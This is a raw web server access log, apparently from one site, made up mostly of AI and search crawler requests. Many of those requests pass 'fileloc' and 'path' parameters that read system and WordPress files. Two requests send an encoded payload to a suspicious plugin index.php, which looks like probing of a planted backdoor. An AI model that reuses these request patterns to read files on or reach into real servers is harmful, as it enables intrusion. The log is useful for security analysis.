216.73.216.183 - - [22/Oct/2025:00:33:55 +0000] "GET /739414181?entity=0736559558 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.194.95.99 - - [22/Oct/2025:00:33:56 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/:0000576/objs_per_slab&path=//sys/kernel/slab/:0000576 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
35.153.46.191 - - [22/Oct/2025:00:33:56 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/anon_vma_chain/reclaim_account&path=//sys/kernel/slab/anon_vma_chain HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:33:56 +0000] "GET /739414181/?entity=0736559558 HTTP/1.1" 200 45438 "https://datainsightnow.com/739414181?entity=0736559558" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:33:58 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/vda2/subsystem/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:33:58 +0000] "GET /739510790?entity=0736655794 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:33:59 +0000] "GET /739510790/?entity=0736655794 HTTP/1.1" 200 45438 "https://datainsightnow.com/739510790?entity=0736655794" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:33:59 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/device/block/vda/subsystem/vda/vda1/subsystem/loop3 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.16.248.61 - - [22/Oct/2025:00:34:00 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/3/attr/prev&path=//proc/3/attr HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.78 - - [22/Oct/2025:00:34:01 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/bdi/subsystem/7:1/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:01 +0000] "GET /773903396?entity=0770915610 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.135.21.75 - - [22/Oct/2025:00:34:02 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363738322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333138322q6537366638623131356365303535393962396338313436626532393066393136222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
216.73.216.183 - - [22/Oct/2025:00:34:02 +0000] "GET /773903396/?entity=0770915610 HTTP/1.1" 200 45438 "https://datainsightnow.com/773903396?entity=0770915610" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.244.66.243 - - [22/Oct/2025:00:34:02 +0000] "GET /robots.txt HTTP/1.1" 200 94 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.171.207.217 - - [22/Oct/2025:00:34:03 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/vda1/subsystem/loop6/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.213.240.226 - - [22/Oct/2025:00:34:04 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=/opt/wpsites/imgs2024.org/plugins/magnific-popup/dist/jquery.magnific-popup.min.js&path=/opt/wpsites/imgs2024.org/plugins/magnific-popup/dist HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.156.146.160 - - [22/Oct/2025:00:34:04 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//var/lib/dpkg/info/bash-completion.conffiles&path=//var/lib/dpkg/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
20.171.207.78 - - [22/Oct/2025:00:34:04 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/vda2/subsystem/sr0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:04 +0000] "GET /773945872?entity=0770957922 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:05 +0000] "GET /773945872/?entity=0770957922 HTTP/1.1" 200 45438 "https://datainsightnow.com/773945872?entity=0770957922" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.16 - - [22/Oct/2025:00:34:06 +0000] "GET /2025/03/07/page/6/?path=//sys/class/pci_bus/0000:0c/subsystem/0000:04/device/driver/0000:00:03.1/subsystem/drivers/pcieport/0000:00:02.6 HTTP/1.1" 200 262209 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.217 - - [22/Oct/2025:00:34:07 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/subsystem/vda/subsystem/vda/device/block/vda/vda1/subsystem/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:07 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/device/block/vda/vda1/subsystem/loop4 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:07 +0000] "GET /773988860?entity=0771000746 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.209.174.110 - - [22/Oct/2025:00:34:08 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//var/lib/dpkg/info/fwupd-signed.list&path=//var/lib/dpkg/info HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:34:08 +0000] "GET /773988860/?entity=0771000746 HTTP/1.1" 200 45438 "https://datainsightnow.com/773988860?entity=0771000746" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:10 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/device/block/vda/subsystem/loop7/subsystem/vda/vda2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:11 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda1/subsystem/vda2/trace HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:11 +0000] "GET /739458215?entity=0736603422 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:11 +0000] "GET /739458215/?entity=0736603422 HTTP/1.1" 200 45438 "https://datainsightnow.com/739458215?entity=0736603422" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.232.90.98 - - [22/Oct/2025:00:34:12 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/kmalloc-rnd-10-512/poison&path=//sys/kernel/slab/kmalloc-rnd-10-512 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
34.239.85.139 - - [22/Oct/2025:00:34:12 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=/opt/wpsites/gsudice.dataconn.net/wp-content/uploads/colibri/web.config&path=/opt/wpsites/gsudice.dataconn.net/wp-content/uploads/colibri HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:34:13 +0000] "GET /72675659?entity=0072395318 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:34:13 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/driver/virtio1/block/vda/subsystem/sr0/queue HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:34:14 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/device/block/vda/subsystem/loop5/subsystem/loop4 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:14 +0000] "GET /72675659/?entity=0072395318 HTTP/1.1" 200 45438 "https://datainsightnow.com/72675659?entity=0072395318" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.209.174.110 - - [22/Oct/2025:00:34:16 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//etc/ssl/certs/607986c7.0&path=//etc/ssl/certs HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:34:16 +0000] "GET /739397603?entity=0736543046 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:34:16 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda2/subsystem/vda/subsystem/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:17 +0000] "GET /739397603/?entity=0736543046 HTTP/1.1" 200 45438 "https://datainsightnow.com/739397603?entity=0736543046" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:17 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/vda1/subsystem/loop4/bdi/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:19 +0000] "GET /739506636?entity=0736651658 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.210.114.189 - - [22/Oct/2025:00:34:20 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/jbd2_inode/cpu_slabs&path=//sys/kernel/slab/jbd2_inode HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.152.246.180 - - [22/Oct/2025:00:34:20 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/lib/python3/dist-packages/requests-2.31.0.egg-info/not-zip-safe&path=//usr/lib/python3/dist-packages/requests-2.31.0.egg-info HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:34:20 +0000] "GET /739506636/?entity=0736651658 HTTP/1.1" 200 45438 "https://datainsightnow.com/739506636?entity=0736651658" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:21 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/vda2/subsystem/sr0/subsystem/vda/bdi/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:21 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda2/subsystem/vda/subsystem/vda2 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.135.21.75 - - [22/Oct/2025:00:34:22 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363830322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333230322q3961366634363031353936666539353237373366326565323536383734663738222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
119.13.86.221 - - [22/Oct/2025:00:34:22 +0000] "GET /?fileloc=//etc/systemd/system/open-vm-tools.service.requires/vgauth.service&path=//etc/systemd/system/open-vm-tools.service.requires HTTP/1.1" 200 45438 "https://datainsightnow.com/?fileloc=//etc/systemd/system/open-vm-tools.service.requires/vgauth.service&path=//etc/systemd/system/open-vm-tools.service.requires" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:34:22 +0000] "GET /774090398?entity=0771101890 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:23 +0000] "GET /774090398/?entity=0771101890 HTTP/1.1" 200 45438 "https://datainsightnow.com/774090398?entity=0771101890" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:34:23 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda1/subsystem/sr0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:34:23 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/device/block/vda/subsystem/vda1/subsystem/loop2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.221.222.168 - - [22/Oct/2025:00:34:24 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/share/cmake-3.28/Modules/FindGettext.cmake&path=//usr/share/cmake-3.28/Modules HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:34:25 +0000] "GET /739355641?entity=0736501246 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:26 +0000] "GET /739355641/?entity=0736501246 HTTP/1.1" 200 45438 "https://datainsightnow.com/739355641?entity=0736501246" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:34:26 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/vda1/subsystem/vda/vda2 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:34:26 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/vda2/subsystem/vda2/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.199.17 - - [22/Oct/2025:00:34:28 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/self/cwd/wp-includes/template.php&path=//proc/self/cwd/wp-includes HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.1.195.155 - - [22/Oct/2025:00:34:28 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/net_namespace/objects&path=//sys/kernel/slab/net_namespace HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:34:28 +0000] "GET /72677731?entity=0072397382 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:29 +0000] "GET /72677731/?entity=0072397382 HTTP/1.1" 200 45438 "https://datainsightnow.com/72677731?entity=0072397382" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:29 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/loop3/subsystem/vda/device/block/vda/subsystem/vda/vda2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:29 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/loop1/subsystem/sr0/queue/bsg/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:31 +0000] "GET /739476080?entity=0736621218 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.215.24.66 - - [22/Oct/2025:00:34:32 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/self/cwd/wp-content/languages/wp-class-requests.php&path=//proc/self/cwd/wp-content/languages HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:34:32 +0000] "GET /739476080/?entity=0736621218 HTTP/1.1" 200 45438 "https://datainsightnow.com/739476080?entity=0736621218" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:33 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/subsystem/vda1/subsystem/loop2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:33 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/vda2/subsystem/loop2/bdi/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:34 +0000] "GET /739334407?entity=0736480094 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:35 +0000] "GET /739334407/?entity=0736480094 HTTP/1.1" 200 45438 "https://datainsightnow.com/739334407?entity=0736480094" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
